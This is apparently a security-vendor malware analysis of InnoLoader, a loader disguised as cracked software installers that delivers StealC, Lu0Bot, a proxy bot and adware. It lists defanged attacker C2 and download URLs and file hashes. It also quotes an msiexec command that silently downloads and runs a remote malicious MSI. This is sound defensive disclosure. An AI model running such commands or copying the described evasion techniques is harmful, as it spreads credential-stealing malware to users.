AhnLab SEcurity intelligence Center (ASEC) has discovered the distribution of a new type of malware that is disguised as cracks and commercial tools. Unlike past malware which performed malicious behaviors immediately upon being executed, this malware displays an installer UI and malicious behaviors are executed upon clicking buttons during the installation process.

It is deemed that when the user makes a download request, a malware is instantly created to give a reply instead of distributing pre-made malware. This means that for every download, a malware with a different hash value and the same functions is created and downloaded.

The malware can download and execute files depending on the response from the C2. Investigations at the time of distribution revealed that Infostealer StealC, Socks5Systemz that uses the infected system as a commercial proxy resource, and Clicker that is disguised as a security-related browser plugin to increase views were installed. Installations of well-known software Opera browser and 360 Security products were also identified.

The C2 string inserted within the sample contained the timestamp value at the time of the download request, and the country information. It is believed that a new malware strain is created and distributed with each download request. Thus the C2 URI and the hash for the sample itself would be different for each download.

It was confirmed that in an IP address environment with a history of the malware having already been downloaded before, a normal WinRAR installation file was downloaded for a certain period of time. This is deemed to be for the purpose of hindering malware tracking and analysis.

The malware has been created with InnoSetup. Upon execution, the following installation screen is output. Clicking the “Next” button twice triggers the malicious behaviors. It will be called “InnoLoader” for convenience.

Figure 4. Malware execution screen

It is configured to perform malicious behaviors when the response value upon the first connection to the C2 is “ok”. However, after a certain period of time after the sample is downloaded, the C2 responds “no”. In this case, the installation process terminates without malicious behaviors. This is also interpreted as an attempt to obstruct analysis.

Once the “ok” response is received from the C2, it obtains the download URL by connecting to the C2 URL defined within the file in order. A file is downloaded and executed from the URL. The download URL is located in the “Location” entry of the C2 reply header. The files being executed in this process include both normal and malware files. The malware sample used for analysis had a total of 6 C2 URLs.

After file download and execution is complete, it connects to the next C2 URL and this process repeats until it connects to all defined C2 URLs. The files executed by the malware sample at the time of analysis are as follows.

StealC Infostealer C2 URL hxxp://monkeyagreement[.]fun/coo.php?paw=883174&spot=1&a=2857&on=444&o=1678 Download URLs hxxp://240601155506901.try.kyhd08[.]buzz/f/fvgbm0601901.txt 0738205d5a1472662b94561e004d9803 (BAT) Malicious browser plugin C2 URL hxxp://monkeyagreement[.]fun/coo.php?paw=762694&spot=2&a=2857&on=458&o=1688 Download URLs hxxps://cdn-edge-node[.]com/online_security_mkl.exe ff640a60d25e4bcf1ef290c3d1893a17 (Dropper)   Opera browser (normal) C2 URL hxxp://monkeyagreement[.]fun/coo.php?paw=401610&spot=3&a=2857&on=420&o=1662 Socks5Systemz C2 URL hxxp://monkeyagreement[.]fun/coo.php?paw=895836&spot=4&a=2857&on=418&o=1660 Download URLs hxxps://song.oaksfoxes[.]ltd/tid/202.exe 1b3ad155c454d3351cfc107344bc4ad5 (Dropper) f8bb5272ce5d5b2e767f85e788dd4c5c (Sock5Syetemz)   360 Security (normal) C2 URL hxxp://monkeyagreement[.]fun/coo.php?paw=956684&spot=5&a=2857&on=460&o=1690 Adware disguised as a Windows update tool C2 URL hxxp://monkeyagreement[.]fun/coo.php?paw=787557&spot=6&a=2857&on=244&o=331 Download URLs hxxp://kapetownlink[.]com/installer.exe fa24733f5a6a6f44d0e65d7d98b84aa6 (Dropper)
95007206c6b2407fb69748ef7c93612 (Adware)

Table 1. Information on files executed by InnoLoader

The StealC Infostealer which begins and is executed from the BAT file is the key element. It is a malware strain which steals important user information and sends them to the C2. It can exfiltrate information such as passwords stored in browsers, application login information for cryptocurrency wallets and FTP mail, and certain file system information. It is an Infostealer that is being actively distributed and was also covered in the following post.

Warning Against Infostealer Disguised as Installer

The BAT file being downloaded and executed by InnoLoader is obfuscated as shown below. Upon execution, it downloads and executes a malicious MSI file from the C2.

Execution command: “msiexec /i hxxp://240601155351354.try.kyhd08[.]buzz/f/fvgbm0601001.msi /qn”

The MSI file was disguised as a Microsoft Visual C++ installer.

When the MSI is executed, it creates a normal Node.js executable file and an obfuscated malicious script in the TEMP directory before executing them.

812d99a3d89b8de1b866ac960031e3df (Node.js)

2e85211a7ab36e6d7e2a4a4b5d88b938 (Script)

The malicious script is the Lu0Bot malware. It creates a C2 URL according to a certain rule, attempts access, can collect information from the infected system, and can execute commands. It is notable that it uses UDP to communicate with the C2. During the analysis process, Lu0Bot was observed downloading and executing the StealC malware. In this process, a DLL file and TXT file are created under the TEMP directory. When the DLL file is executed with a certain argument, the StealC malware is executed in the end.

Caution is advised because for maintenance of persistence, Lu0Bot which installs StealC copies itself under the ProgramData directory and creates a shortcut in the Startup folder. When this malware is running, the threat actor can install any additional malware anytime.

It can be seen that the malware is executed through a very complex process to render analysis and tracking difficult. This malware strain is currently being actively distributed. Because it can perform behaviors according to responses from the C2, the threat actor can install any other malware they wish to anytime. As such, the threat actor is using various methods to hinder analysis and detection. Official distribution sites must be used when downloading files. It is recommended to refrain from using illegal tools. Users must not execute files downloaded from untrusted pages.

AhnLab detects and blocks the malware mentioned in the report under the aliases below.

Infostealer/Win.InnoLoader.R653716 (2024.06.13.02)

Infostealer/Win.Stealc.R654152 (2024.06.19.00)

Trojan/MSI.Stealc

Trojan/BAT.Loader